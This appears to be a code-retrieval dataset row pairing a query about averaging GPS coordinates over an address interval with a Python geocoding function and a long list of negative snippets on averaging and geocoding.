Dataset columns:
    query            string    (length 9 to 3.4k)
    document         string    (length 9 to 87.4k)
    metadata         dict
    negatives        sequence  (length 4 to 101)
    negative_scores  sequence  (length 4 to 101)
    document_score   string    (length 3 to 10)
    document_rank    string    (102 distinct values)
Gets the average GPS coordinates of the rough address interval
def selective_geocode(rough_address: str) -> dict:
    lat_results = []; lon_results = []
    found = re.findall(r"\d+~\d+", rough_address)
    if not found:
        raise geo.AddressError(geo.__name__, rough_address)
    bound = [int(i) for i in found[0].split('~')]
    if bound[0] > bound[1]:
        raise geo.AddressError(geo.__name__, rough_address)
    interval = int((bound[1] - bound[0] + 1) / settings.GEO_SAMPLES)
    samples = [i for i in range(bound[0], bound[1] + 1, interval)]
    for sample in samples:
        query_address = rough_address.replace(found[0], str(sample))
        gps_coordinates = geo.geocode(query_address, culture='zh-TW')["GPS"]
        if gps_coordinates["lat"] and gps_coordinates["lon"]:
            lat_results.append(gps_coordinates["lat"])
            lon_results.append(gps_coordinates["lon"])
    return {"lat": lat_results, "lon": lon_results}
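A minimal, self-contained sketch of the sampling-and-averaging idea the document above implements. The fake_geocode stub, the GEO_SAMPLES value, and the example rough address are assumptions standing in for the geo wrapper and settings.GEO_SAMPLES referenced in the function; this is an illustration, not the dataset's own code.

import re

GEO_SAMPLES = 5  # assumed value of settings.GEO_SAMPLES

def fake_geocode(address: str) -> dict:
    # Stub geocoder so the sketch runs offline; always returns one fixed coordinate.
    return {"GPS": {"lat": 25.0330, "lon": 121.5654}}

rough = "台北市中正區忠孝東路一段1~100號"        # hypothetical rough address with a house-number interval
found = re.findall(r"\d+~\d+", rough)[0]         # -> "1~100"
low, high = (int(x) for x in found.split("~"))
step = int((high - low + 1) / GEO_SAMPLES)       # -> 20
samples = range(low, high + 1, step)             # -> 1, 21, 41, 61, 81

lats, lons = [], []
for number in samples:
    gps = fake_geocode(rough.replace(found, str(number)))["GPS"]
    lats.append(gps["lat"])
    lons.append(gps["lon"])

print(sum(lats) / len(lats), sum(lons) / len(lons))  # averaged centre of the interval

With a real geocoder each sampled house number would resolve to a different point, so the printed averages approximate the centre of the 1~100 address segment.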
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def gavg(idata):\n\t\n\twgt1=np.cos(np.deg2rad(idata.lat))*(idata*0+1)\n\tga=(wgt1*idata).sum(dim=['lat','lon'])/wgt1.sum(dim=['lat','lon'])\n\n\treturn ga", "def _get_lat_avg(self, report):\n match = re.search(\"\\s*lat\\s*\\((\\w+)\\).*avg\\=\\s*(\\d+\\.{0,1}\\d*)\",\n report)\n if match:\n unit = match.group(1)\n value = float(match.group(2))\n if unit.lower() == \"usec\":\n value = value / 1000\n return value", "def geo_average(self, returns):\r\n return (1 + returns).prod() ** (self.day / len(returns)) - 1", "def mean_average_position():\n pass", "def get_avg_points(self):\n pass", "def average_coords_nt(all_profile_nt: namedtuple) -> tuple:\n \"\"\"Param: all_profile_nt: Named tuple containing all profiles\"\"\"\n x, y = sum(map(lambda t: t[0], map(lambda v: v[4], all_profile_nt)))/len(all_profile_nt), sum(\n map(lambda t: t[1], map(lambda v: v[4], all_profile_nt)))/len(all_profile_nt)\n return x, y", "def average_coords_dc(all_profile_dict: dict) -> tuple:\n \"\"\"Param:all_profile_dc: dictionary containing all profiles\"\"\"\n x, y = sum(map(lambda t: t[0], map(lambda v: v['current_location'], all_profile_dict.values()))) / len(all_profile_dict.values(\n )), sum(map(lambda t: t[1], map(lambda v: v['current_location'], all_profile_dict.values()))) / len(all_profile_dict.values())\n return x, y", "def get_coords(self, address):\n while True:\n try:\n location = self.geolocator.geocode(address) \n break\n except:\n time.sleep(20)\n\n try:\n latitude = location.latitude\n longitude = location.longitude\n except:\n latitude = np.nan\n longitude = np.nan\n\n return((latitude, longitude))", "def avg_pressure(start, end):\n return round((start + end) / 2, 2)", "def average(coords):\n x = 0\n y = 0\n for coord in coords:\n x += coord[0]\n y += coord[1]\n count = len(coords)\n return (x/count, y/count)", "def get_average_neighbors(self,radius):\n return np.mean([agent.n_neighbors(radius) for agent in self.agents])", "def fAvg(H, r):\n p = r[['start_lat', 'start_lng']]\n p.columns = ['lat', 'lng']\n d = r[['end_lat', 'end_lng']]\n d.columns = ['lat', 'lng']\n\n return f(H, p, d).sum()", "def average_point(self, *points):\n length = len(points)\n sum_x = reduce(lambda total, point: total + point[0], points, 0)\n sum_y = reduce(lambda total, point: total + point[1], points, 0)\n return (sum_x/length, sum_y/length)", "def averages(data, bbox):\n\n # load mapbox\n nb, sb, eb, wb = bbox\n G = ox.graph_from_bbox(nb, sb, eb, wb)\n dist = 0.0001\n edges = ox.utils_graph.graph_to_gdfs(G, nodes=False, fill_edge_geometry=True)\n edges['index'] = range(1, len(edges)+1)\n\n all_data = dict()\n for index, row in data.iterrows():\n date = datetime.fromtimestamp(row['time'])\n print(date)\n if date not in all_data:\n all_data[date] = [row]\n else:\n all_data[date].append(row)\n\n rows = []\n for key, value in all_data.items():\n # get closest point on each segment\n lng = value['long']\n lat = data['lat']\n ne, dist = ox.distance.nearest_edges(G, lng, lat, return_dist=True)\n print(ne)\n \n rows.append({\"\"})", "def meanHaversineDistance(lat_sub, lon_sub, lat_real, lon_real):\n return np.mean(HaversineDistance(lat_sub, lon_sub, lat_real, lon_real))", "def _get_average(self):\n norm = 1.0\n for pos, idx in enumerate(self.idx):\n norm *= (self.high[pos] - self.low[pos])\n return 1.0/norm", "def average(self, start, end):\n return self.integrate(start, end) / (end - start)", "def get_position_avg_price(self):\n self.__init_client()\n return float(self.get_position()['entryPrice'])", "def 
get_average_start_radius(self):\n total_length = len(self.pixel_list)\n\n if not total_length:\n return 0\n elif total_length < 5:\n total_radius = 0\n for i in range(total_length):\n total_radius += self.pixel_list[i].radius\n return total_radius/total_length\n else:\n total_radius = 0\n for i in range(5):\n total_radius += self.pixel_list[i].radius\n return total_radius/5", "def get_avg_range(range_array):\n # Average the ranges\n range_count = 0\n range_accum = 0.0\n\n if range_array:\n # Accumulate the data\n for beam in range(len(range_array)):\n if range_array[beam] > 0.0 and not Ensemble.is_bad_velocity(range_array[beam]):\n range_count += 1\n range_accum += range_array[beam]\n\n if range_count > 0:\n return range_accum / range_count\n else:\n return 0.0", "def generate_average_coord_numbers(self):\n coord_numbers = {}\n for typea in self.atomtypes:\n coord_numbers[znum2sym.z2sym(typea)] = 0\n for typeb in self.atomtypes:\n coord_numbers[znum2sym.z2sym(typea)+'-'+znum2sym.z2sym(typeb)] = 0\n for atom in self.atoms:\n for n in atom.neighs:\n coord_numbers[znum2sym.z2sym(atom.z)] += 1\n coord_numbers[znum2sym.z2sym(atom.z)+'-'+znum2sym.z2sym(n.z)] += 1\n for key in coord_numbers:\n elem = znum2sym.sym2z(key.split('-')[0])\n coord_numbers[key] /= float(self.atomtypes[elem])\n return coord_numbers", "def __calculate_average_distance(self):\n game = self.__game # type: Game\n all_icebergs = game.get_all_icebergs()\n all_icebergs_length = len(all_icebergs)\n sum_distances = 0\n for i in range(all_icebergs_length):\n for j in range(i + 1, all_icebergs_length):\n iceberg1 = all_icebergs[i]\n iceberg2 = all_icebergs[j]\n sum_distances += iceberg1.get_turns_till_arrival(iceberg2)\n\n return sum_distances / (all_icebergs_length * (all_icebergs_length - 1) / 2)", "def get_coordinates_from_address(address):\n \n geolocator = Nominatim(user_agent=\"NAIP\")\n location = geolocator.geocode(address)\n print('Retrieving location for address:\\n{}'.format(location.address))\n return location.latitude, location.longitude", "def avg_equivlat(in_field, pv_field, n_lon, n_lat):\n # constants\n PI = np.pi\n\n # grid characteristics\n n_grid = int(n_lon)*int(n_lat)\n phi = PI/n_lat\n phih = 0.5*PI - phi*np.arange(n_lat+1)\n\n area_field = np.zeros([n_lon, n_lat])\n for j in range(n_lat):\n area_field[:, j] = 2*PI*(np.sin(phih[j]) - np.sin(phih[j+1]))/n_lon\n\n # reorder the fields\n ord_ind = np.argsort(pv_field, axis=None)[::-1]\n infield_ordered = in_field.flatten()[ord_ind]\n pv_ordered = pv_field.flatten()[ord_ind]\n area_ordered = area_field.flatten()[ord_ind]\n\n # areas of equivalent latitude bands for output\n # sum area along latitude bands\n area_band = np.sum(area_field, axis = 0)\n infield_eq = np.zeros(n_lat)\n\n ll = 0\n area_now = 0.0\n infield_tot = 0.0\n\n # loop to average in equivalent latitude bands\n for nn in range(n_grid):\n area_now += area_ordered[nn]\n infield_tot += area_ordered[nn]*infield_ordered[nn]\n if (area_now >= area_band[ll] or (nn == n_grid-1)):\n infield_tot -= (area_now - area_band[ll])*infield_ordered[nn]\n infield_eq[ll] = infield_tot/area_band[ll]\n infield_tot = (area_now - area_band[ll])*infield_ordered[nn]\n area_now -= area_band[ll]\n ll += 1\n \n # in field is averaged along eq. 
latitude bands from 90N - 90S\n # legacy from times when we were mostly interested in NH \n lat = PI/2 - np.arange(n_lat)*phi \n return (lat, infield_eq)", "def get_mean_radius(self):\n\n radius = np.array(self.coord_list)\n radius[:, 0] -= self.mean_pos[0]\n radius[:, 1] -= self.mean_pos[1]\n radius = np.sqrt(np.sum(radius ** 2, axis=1))\n mean_radius = np.mean(radius)\n return mean_radius", "def average_distance(self):\r\n total = 0\r\n edges = 0\r\n for code, _list in self.edges.items():\r\n for edge in _list:\r\n total += edge.distance\r\n edges += 1\r\n return total / edges", "def streets_per_node_avg(G):\n spn_vals = streets_per_node(G).values()\n return sum(spn_vals) / len(G.nodes)", "def mean_radius(self):\n return self._mean_radius", "def get_network_average_position(self):\n # the total number of nodes in the network\n num_nodes = self.total_nodes()\n\n # get the location of all nodes\n all_nodes = np.empty((num_nodes, R_space))\n for index, item in enumerate(self.nodes.values()):\n\n all_nodes[index] = item.get_position()\n\n # get the sum of all of the positions along space dim and divide by the number of nodes\n average_position = np.sum(all_nodes, axis=0) / num_nodes\n\n return average_position", "def mean_lon_of_perigee(jd):\n T = (jd - jd1950) / 36525.0\n\n p = (0.012, 1.65, 6190.67, 1015489.951)\n\n return np.polyval(p, T) / 3600.0", "def get_mean(self):\n mean = np.array(np.zeros((4,8)))\n for i,c in enumerate(self.cellLines):\n for j,l in enumerate(self.ligands):\n mean[i][j] = self.aucs[c][l]['mean']\n return mean", "def get_average_end_radius(self):\n total_length = len(self.pixel_list)\n\n if not total_length:\n return 0\n elif total_length < 5:\n total_radius = 0\n for i in range(total_length):\n total_radius += self.pixel_list[i].radius\n return total_radius/total_length\n else:\n total_radius = 0\n for i in range(total_length-5, total_length):\n total_radius += self.pixel_list[i].radius\n return total_radius/5", "def get_average(points):\n x = mean([p[0] for p in points])\n y = mean([p[1] for p in points])\n return x, y", "def averageDominationCount(leaf):\n averageDominationCount = np.nanmean(leaf.calDominationCount())\n return averageDominationCount", "def average(cls, points):\n return Point.sum(points) / len(points)", "def center(coords):\n for c in coords:\n if 'avg' not in locals():\n avg = c\n else:\n avg += c\n return avg / len(coords)", "def _get_mean(self):\n return (0.485, 0.456, 0.406)", "def geo(address):\n API_PRIVATE = os.environ.get(\"TOM_TOM_PRIVATE\")\n encoded = urllib.parse.quote(address)\n query ='https://api.tomtom.com/search/2/geocode/' + str(encoded) + \\\n '.json?limit=1&countrySet=US&lat=42&lon=-72&topLeft=42.886%2C%20-73.508&btmRight=41.237%2C-69.928&key=' \\\n + API_PRIVATE\n\n response = requests.get(query)\n while True:\n try:\n jsonResponse = response.json()\n break\n except:\n response = requests.get(query)\n\n latit = 0\n longit = 0\n\n for address in jsonResponse['results']:\n latit = address['position']['lat']\n longit = address['position']['lon']\n return latit, longit", "def get_average_dist_to_tok_start_and_end(doc_span, tok_start_position, tok_end_position):\n center_answer = (tok_start_position + tok_end_position) // 2\n dist_to_start = abs(doc_span.start - center_answer)\n dist_to_end = abs(doc_span.start + doc_span.length - 1 - center_answer)\n return (dist_to_start + dist_to_end) // 2", "def average(self):\n return (self.current + self.last) / 2.0", "def get_average(self, s_freq, e_freq):\n s_ind = self.get_bin(s_freq)\n 
e_ind = self.get_bin(e_freq)\n lst = self.mags[s_ind:e_ind+1]\n try:\n avg = sum(lst)/len(lst)\n except:\n print(s_ind, e_ind)\n print('werid stuff')\n avg = 0\n return avg", "def mean(self) -> float:\n return self._interval_sum / len(self.intervals)", "def average(x, y):\n #helper function for get_accuracy\n average = (x+y)/2 \n return average", "def get_lat_long(address):\n url = \"https://maps.googleapis.com/maps/api/geocode/json\"\n params = {'address':address,'key':'AIzaSyBVZhQwm7GZViRzTCuH1VBvMdIpLMwvfT4'}\n req = requests.get(url,params=params)\n stat = req.status_code\n latitude = req.json()['results'][0]['geometry']['location']['lat']\n longitude = req.json()['results'][0]['geometry']['location']['lng']\n return latitude, longitude", "def spatial_avg(self, input_layer):\n return tf.reduce_mean(input_layer, [2, 3], name='spatial_avg')", "def find_average(self):\n df = self.find_top_seven_routes()\n # Find the total of the frequency of the top 7 traveled routes\n total =df.sort_values('Frequency', ascending=False).Frequency[:7].sum()\n # Calculate the average by dividing each frequency by the total\n df['average'] = df['Frequency'] / total\n\n return df", "def _avg_sample(self):\n samples = [0] * self.num_samples\n for i in range(self.num_samples):\n samples[i] = self.sensor.measure_distance()\n time.sleep(self.sample_delay)\n if self.drop_extremes:\n samples.sort()\n samples = samples[1:-1]\n return sum(samples) / len(samples)", "def point_avg(points):\n if len(points)==1:\n new_center= np.mean(points)\n else:\n new_center= [np.mean([x[y] for x in points]) for y in range(len(points[0]))]\n return new_center", "def get_agl(coordinate):\n level, lat, lon = coordinate\n asl_hgt = ((ph.isel(bottom_top_stag=level, south_north=lat, west_east=lon) +\\\n ph.isel(bottom_top_stag=level+1, south_north=lat, west_east=lon))/2) +\\\n ((phb.isel(bottom_top_stag=level, south_north=lat, west_east=lon) +\\\n phb.isel(bottom_top_stag=level+1, south_north=lat, west_east=lon))/2) \\\n / GRAVITY\n agl_hgt = asl_hgt - hgt.isel(south_north=lat, west_east=lon)\n\n return (level, lat, lon, float(agl_hgt.values))", "def get_average(self):\n self.avg = math.floor((self.maths + self.phy + self.che) / 3, )\n self.assign_grade()\n return self.avg\n # End of method get_average", "def get_coord_from_address(code_postal, adresse=None):\n headers = {\"Content-Type\": \"application/json\"}\n if adresse != None:\n url = str((\"http://api-adresse.data.gouv.fr/search/?q=\" + str(adresse) + \"&postcode=\" + str(code_postal)))\n else:\n url = str((\"http://api-adresse.data.gouv.fr/search/?q=\" + str(code_postal)))\n print(url)\n r = requests.get(url, headers=headers, data=\"\")\n js = json.loads(r.text)\n if code_postal == 75001:\n x = js['features'][1]['geometry']['coordinates']\n else:\n \tx = js['features'][0]['geometry']['coordinates']\n longitude = x[0]\n latitude = x[1]\n pos = []\n pos.append(longitude)\n pos.append(latitude)\n print(pos)\n return pos", "def get_avg_around_pix(x0, y0, arr):\n x, y = [x0], [y0]\n if x0 > 0:\n x.append(x0 - 1)\n if arr.shape[0] - 1 > x0:\n x.append(x0 + 1)\n if y0 > 0:\n y.append(y0 - 1)\n if arr.shape[1] - 1 > y0:\n y.append(y0 + 1)\n neighb = [arr[i][j] for i in x for j in y]\n avg = np.mean(neighb)\n return avg", "def find_area(self):\n min_lat_point = self.latitude_min\n max_lat_point = self.latitude_max\n min_lon_point = self.longitude_min\n max_lon_point = self.longitude_max\n self.rename_latitude()\n self.rename_longitude()\n all_lat_bounds = 
self.cube.coord('latitude').bounds\n all_lon_bounds = self.cube.coord('longitude').bounds\n # print(all_lat_bounds)\n # print(all_lon_bounds)\n for i, lat in enumerate(all_lat_bounds):\n for j, lon in enumerate(all_lon_bounds):\n lat_bounds = lat # 2D array of the lower and upper lat bounds\n lon_bounds = lon # 2D array of the lower and upper lon bounds\n if lat_bounds[0] <= min_lat_point < lat_bounds[1]:\n if lon_bounds[0] <= min_lon_point < lon_bounds[1]:\n nlat_min = i\n nlon_min = j\n else:\n pass\n else:\n pass\n\n for k, lat in enumerate(all_lat_bounds):\n for l, lon in enumerate(all_lon_bounds):\n lat_bounds = lat # 2D array of the lower and upper lat bounds\n lon_bounds = lon # 2D array of the lower and upper lon bounds\n if lat_bounds[0] <= max_lat_point < lat_bounds[1]:\n if lon_bounds[0] <= max_lon_point < lon_bounds[1]:\n nlat_max = k\n nlon_max = l\n else:\n pass\n else:\n pass\n\n area_subset = self.cube[:, nlat_min:nlat_max+1, nlon_min:nlon_max+1]\n # print(area_subset.coord('latitude').points)\n # print(area_subset.coord('longitude').points)\n area_mean = area_subset.collapsed(['latitude', 'longitude'],\n iris.analysis.MEAN)\n\n return area_mean", "def avg_bp_from_range(self, bp):\n \n if '-' in bp:\n maxlen = float(bp.split(\"-\",1)[1])\n minlen = float(bp.split(\"-\",1)[0])\n bp = ((maxlen - minlen)/2) + minlen\n return(int(bp))", "def avg(x, y):\n return (x + y)/2", "def get_average(self, *dims):\n p = self.get_points(*dims)\n ret = np.average(p, axis=0)\n if ret.size == 1:\n return ret[0]\n return ret", "def _avg_bp_from_range(self, bp):\n # copied from multiqc v1.6\n\n try:\n if \"-\" in bp:\n maxlen = float(bp.split(\"-\", 1)[1])\n minlen = float(bp.split(\"-\", 1)[0])\n bp = ((maxlen - minlen) / 2) + minlen\n except TypeError:\n pass\n return int(bp)", "def geo_mean(num_list):\n np_array = np.array(num_list)\n return np_array.prod() ** (1.0 / len(np_array))", "def coordExtrema(a):\n # Extreme values of longitude and latitude in the survey.\n longiMin = sp.inf\n latMin = sp.inf\n longiMax = -sp.inf\n latMax = -sp.inf\n for t in range(len(a)):\n if a[t].pktCount > 0:\n arraMin = sp.amin(a[t].longi)\n if arraMin < longiMin:\n longiMin = sp.amin(a[t].longi)\n arraMin = sp.amin(a[t].lat)\n if arraMin < latMin:\n latMin = arraMin\n arraMax = sp.amax(a[t].longi)\n if arraMax > longiMax:\n longiMax = arraMax\n arraMax = sp.amax(a[t].lat)\n if arraMax > latMax:\n latMax = arraMax\n\n ext = cs.emptyClass()\n ext.longiMin = longiMin\n ext.longiMax = longiMax\n ext.latMin = latMin\n ext.latMax = latMax\n return ext", "def bounds(address):\n endpoint = 'http://maps.googleapis.com/maps/api/geocode/json'\n sensor = 'true'\n try:\n query_string = urllib.urlencode(OrderedDict(address=address, sensor=sensor))\n url = \"%s?%s\" % (endpoint, query_string)\n res = urllib.urlopen(url)\n data = res.read()\n d = json.loads(data)\n if 'results' in d:\n for r in d['results']:\n name = None\n if 'formatted_address' in r:\n name = r['formatted_address']\n if 'geometry' in r:\n if 'bounds' in r['geometry']:\n bounds = r['geometry']['bounds']\n ne = bounds['northeast']\n sw = bounds['southwest']\n bnds = [sw['lng'], ne['lat'], ne['lng'], sw['lat']]\n print \"%s \\n%s\" % (name, ','.join([str(b) for b in bnds]))\n except IOError:\n print sys.stderr, 'Could not open URL.'", "def create_locs(address):\r\n geolocator = Nominatim(user_agent = 'SF_Parking_EDA')\r\n try:\r\n location = geolocator.geocode(address, timeout = 10)\r\n except:\r\n location = None\r\n time.sleep(1)\r\n\r\n if location != None 
and check_location(location):\r\n return (location.latitude, location.longitude )\r\n else:\r\n return None", "def get_average_measurements_for_area(area_id):\n locations = db_access.get_locations_for_area(area_id)\n\n if len(locations) == 0:\n return None\n else:\n return_table = []\n for i in locations:\n for k in db_access.get_measurements_for_location(i[0]):\n return_table.append(k[1])\n return mean(return_table)", "def get_mean_point_response(self): # pragma: no cover\n pass", "def average_speed(self):\n return self.total_distance * 3600 / self.total_time", "def _get_average_mapping(percentiles_database):\n # Assuming percentiles_database.shape == (num_data_points, num_percentiles)\n pc1 = percentiles_database[:, 0]\n pc2 = percentiles_database[:, -1]\n s1, s2 = STANDARD_RANGE\n slopes = (s2 - s1) / (pc2 - pc1)\n slopes = np.nan_to_num(slopes)\n intercepts = np.mean(s1 - slopes * pc1)\n num_images = len(percentiles_database)\n final_map = slopes.dot(percentiles_database) / num_images + intercepts\n return final_map", "def get_geocode(self, address):\n\n try:\n raw_data = self.__get_raw_data(address)\n except (URLError, ValueError):\n return 503, None\n else:\n code, coords = self.__parse_raw_data(raw_data)\n return code, coords", "def get_bounds(self):\n\n northing=self.f.variables['y']\n easting=self.f.variables['x']\n\n lat1,lon1 = utm.to_latlon(np.min(easting),np.min(northing),11,northern=True)\n lat2,lon2 = utm.to_latlon(np.max(easting),np.max(northing),11,northern=True)\n\n return (lon1,lon2,lat1,lat2)", "def get_average(self) -> float:\n return sum(self._scores) / len(self._scores)", "def geocode(address):\n\n mapsurl = ('http://maps.googleapis.com/maps/api/geocode/xml?address=' +\n address.replace(' ', '+') + '&sensor=false')\n\n coords = urllib.urlopen(mapsurl).read()\n root = etree.fromstring(coords)\n coordstr = (0, 0)\n loc = root.find(\".//location\")\n if not loc is None:\n coordstr = (loc[1].text, loc[0].text)\n return coordstr", "def _get_clat_avg(self, report):\n match = re.search(\".*clat\\s*\\((\\w+)\\).*avg\\=\\s*(\\d+\\.{0,1}\\d*)\",\n report)\n if match:\n unit = match.group(1)\n value = float(match.group(2))\n if unit.lower() == \"usec\":\n value = value / 1000\n return value", "def get_average_energy(audio, beats, begin, end):\n buffer = np.square(audio[int(beats[int(begin)]):int(beats[int(end)])])\n average = np.mean(buffer)\n return average", "def get_mean_offset(a, b):\n off = np.abs(a - b)\n return np.sum(off) / b.sum()", "def avg(self):\n return sum(self.times) / len(self.times)", "def avg(self):\n return sum(self.times) / len(self.times)", "def avg(self):\n return sum(self.times) / len(self.times)", "def avg_temps(self):\r\n average_temp = 0\r\n for j in range(len(self.trip)):\r\n average_temp += self.trip[j].get_temperature(j)\r\n average_temp /= len(self.trip)\r\n return average_temp", "def area_average(cube, region):\n \n # Specify the latitudes and longitudes starting from the smallest number to largest or in latitude and longitude from south to north and east to west\n lon1, lon2, lat1, lat2 = region[0], region[1], region[2], region[3] \n # Then intersect the data at these points\n cube = cube.intersection(longitude=(lon1, lon2),latitude=(lat1, lat2))\n\n #cube.coord('latitude').guess_bounds()\n #cube.coord('longitude').guess_bounds()\n\n # area weighting\n weights = iris.analysis.cartography.area_weights(cube)\n # Average that area by latitude and longitudes by the weighted mean\n cube = cube.collapsed(['latitude','longitude'], iris.analysis.MEAN, 
weights=weights)\n\n return cube", "def average_grad(self):\n\n # Compute the respective gradients\n grad_line_1 = self.gradient(0,1)\n grad_line_2 = self.gradient(2,3)\n\n a1 = np.abs(np.arctan(grad_line_1))\n a2 = np.abs(np.arctan(grad_line_2))\n\n ave_grad = np.tan((a1+a2)/2)\n\n #ave_grad = np.average([grad_line_1,grad_line_2]) # Compute the average gradient\n\n return ave_grad", "def mean_absolute_percentage_error(groundtruth, predictions):\n gt = np.array(groundtruth)\n pred = np.array(predictions)\n errors = np.abs(pred - gt)\n averages = (np.abs(gt) + np.abs(pred)) / 2.0\n return 100.0 * np.mean(errors / averages)", "def meanZmArea(self):\n sumArea = 0\n for site in self.sites:\n sumArea = sumArea + site.siteZmArea\n meanArea = sumArea / self.countSites()\n return meanArea", "def _sum_over_lat_lon(arr):\n return arr.sum(internal_names.LAT_STR).sum(internal_names.LON_STR)", "def centered_average(nums):\n maxvalue = nums[0]\n minvalue = nums[0]\n sum = 0\n for x in nums:\n maxvalue = max(maxvalue, x)\n minvalue = min(minvalue, x)\n sum += x\n return (sum - maxvalue - minvalue) / (len(nums) - 2)", "def calcApproxDist(lon1, lat1, lon2, lat2):\n\n import math\n from shapely.geometry import Point\n\n if lat1 == lat2 and lon1 == lon2:\n return 0.0\n\n point1 = Point(lon1,lat1)\n point2 = Point(lon2, lat2)\n\n return math.acos(math.sin(math.radians(point1.y))*math.sin(math.radians(point2.y))+math.cos(math.radians(\n point1.y))*math.cos(math.radians(point2.y))*math.cos(math.radians(point2.x)-math.radians(point1.x)))*6371", "def gmrae(self, benchmark: np.ndarray = None) -> float:\n return _geometric_mean(np.abs(self._relative_error(benchmark)))", "def average_fitness(self):\n return sum([e.fitness for e in self.population]) / len(self.population)", "def coldaverage( names):\n\n rs = radioastronomy.Spectrum() # create input and average structures\n avenames = names # create an output list to average\n\n# assume only a limited range of galactic latitudes are available\n# not range above +/-60.\n use60Range = False\n minGlat = 90. # initialize to extremea\n maxGlat = -90.\n maxEl = -90.\n minEl = 90.\n ncold = 0\n\n # for all input files\n for filename in names:\n\n parts = filename.split('/')\n nparts = len(parts)\n if nparts == 1:\n aname = parts[0]\n else:\n aname = parts[nparts-1]\n\n parts = aname.split('.')\n nparts = len(parts)\n if nparts < 2:\n print 'File is not an astronomy file: ',filename\n continue\n else:\n extension = parts[nparts-1]\n\n extension = extension.upper()\n if extension != 'AST': # speed up by only looking at astronomy files\n continue\n \n rs.read_spec_ast(filename) # An observation, read values\n\n if rs.telel < 0: # only working with observations, skip elevation <= 0.\n continue\n\n maxGlat = max( rs.gallat, maxGlat)\n minGlat = min( rs.gallat, minGlat)\n maxEl = max( rs.telel, maxEl)\n minEl = min( rs.telel, minEl)\n # end for all files loop, looking for max el and latitude ranges\n\n # if any high galactic latitudes, use only above +/-60d \n if minGlat < -60. or maxGlat > 60.:\n minGlat = -60.\n maxGlat = 60.\n else: # else no high galactic latitude data\n # use highest galactic latitudes - +/-5.degrees\n if -minGlat > maxGlat: # if negative latitudes higher\n minGlat = minGlat + 5.\n maxGlat = 90.\n else: # else positive latitudes higher\n maxGlat = maxGlat - 5.\n minGlat = -90.\n\n # only use the elevations above 60 degrees, if any\n if maxEl > 60.:\n maxEl = 60.\n else:\n maxEl = maxEl - 10. 
#else must use highest elevations available\n\n # now average coldest data for calibration\n for filename in names:\n\n rs.read_spec_ast(filename)\n rs.azel2radec() # compute ra,dec from az,el\n\n if rs.telel < maxEl:\n continue\n\n if rs.gallat > maxGlat or rs.gallat < minGlat:\n avenames[ncold] = filename\n ncold = ncold + 1\n # end of for all files loop\n\n ncold, cold = average( avenames[0:ncold]) # now use generic program for averages\n if ncold < 1:\n print 'No Cold load files; can not calibrate!'\n exit()\n\n return ncold, cold, minEl, maxEl", "def getArea(self):\n seg = self._group_index\n groups = np.unique(seg)\n ng = len(groups)\n area = 0\n for i in range(ng):\n group_segments = np.where(groups[i] == seg)[0]\n nseg = len(group_segments) - 1\n for j in range(nseg):\n ind = group_segments[j]\n p0 = latlon2ecef(self._toplats[ind],\n self._toplons[ind],\n self._topdeps[ind])\n p1 = latlon2ecef(self._toplats[ind + 1],\n self._toplons[ind + 1],\n self._topdeps[ind + 1])\n p2 = latlon2ecef(self._botlats[ind + 1],\n self._botlons[ind + 1],\n self._botdeps[ind + 1])\n p3 = latlon2ecef(self._botlats[ind],\n self._botlons[ind],\n self._botdeps[ind])\n a = np.sqrt((p1[0] - p0[0])**2 +\n (p1[1] - p0[1])**2 +\n (p1[2] - p0[2])**2)\n b = np.sqrt((p2[0] - p0[0])**2 +\n (p2[1] - p0[1])**2 +\n (p2[2] - p0[2])**2)\n c = np.sqrt((p2[0] - p1[0])**2 +\n (p2[1] - p1[1])**2 +\n (p2[2] - p1[2])**2)\n s = (a + b + c) / 2\n A1 = np.sqrt(s * (s - a) * (s - b) * (s - c))\n a = np.sqrt((p0[0] - p3[0])**2 +\n (p0[1] - p3[1])**2 +\n (p0[2] - p3[2])**2)\n b = np.sqrt((p2[0] - p3[0])**2 +\n (p2[1] - p3[1])**2 +\n (p2[2] - p3[2])**2)\n c = np.sqrt((p0[0] - p2[0])**2 +\n (p0[1] - p2[1])**2 +\n (p0[2] - p2[2])**2)\n s = (a + b + c) / 2\n A2 = np.sqrt(s * (s - a) * (s - b) * (s - c))\n area = area + (A1 + A2) / 1000 / 1000\n return area", "def get_map(self):\n average_precisions = []\n \n for query, answer in tqdm(zip(self.test_queries, self.results)):\n correct_set = self.correct_answers[query]\n average_precision = 0\n n_relevant = 0\n for i, candidate in enumerate(answer):\n if candidate in correct_set:\n n_relevant += 1\n average_precision += (n_relevant / (i + 1))\n average_precision /= len(correct_set)\n average_precisions.append(average_precision)\n \n return np.mean(average_precisions)", "def find_stop_near(address):\n latlong = get_lat_long(address)\n latitude = latlong[0]\n longitude = latlong[1]\n nearStop = get_nearest_station(latitude, longitude)\n return nearStop", "def _get_mean_pole(self, coord):\n version = config.tech.mean_pole_version.str\n key = coord + \"_\" + str(version)\n if key not in self._mean_pole_cache:\n mean_xp = np.empty(self.time.size)\n mean_yp = np.empty(self.time.size)\n # Calculate correction\n for obs, time in enumerate(self.time.tt):\n # Equation (7.25) IERS Conventions 2010\n mean_xp[obs], mean_yp[obs], _ = iers.iers_cmp_2015(version, time.jyear)\n self._mean_pole_cache[\"x_\" + str(version)] = mean_xp\n self._mean_pole_cache[\"y_\" + str(version)] = mean_yp\n return self._mean_pole_cache[key]", "def get_average(data):\n average = sum(data) / len(data)\n\n return average", "def avgtime(self):\n return (self._total_time['value'] / 1000) / self._total_time['count'] if self._total_time['count'] else 0", "def _avg(cls, l):\n\n return sum(l) / float(len(l))", "def getLatAndLong(addr):\n\ttry:\n\t\tlocation = geolocator.geocode(addr, timeout = 2)\n\n\t\tprint (location.latitude, location.longitude)\n\t\treturn (location.latitude, location.longitude)\n\texcept Exception, 
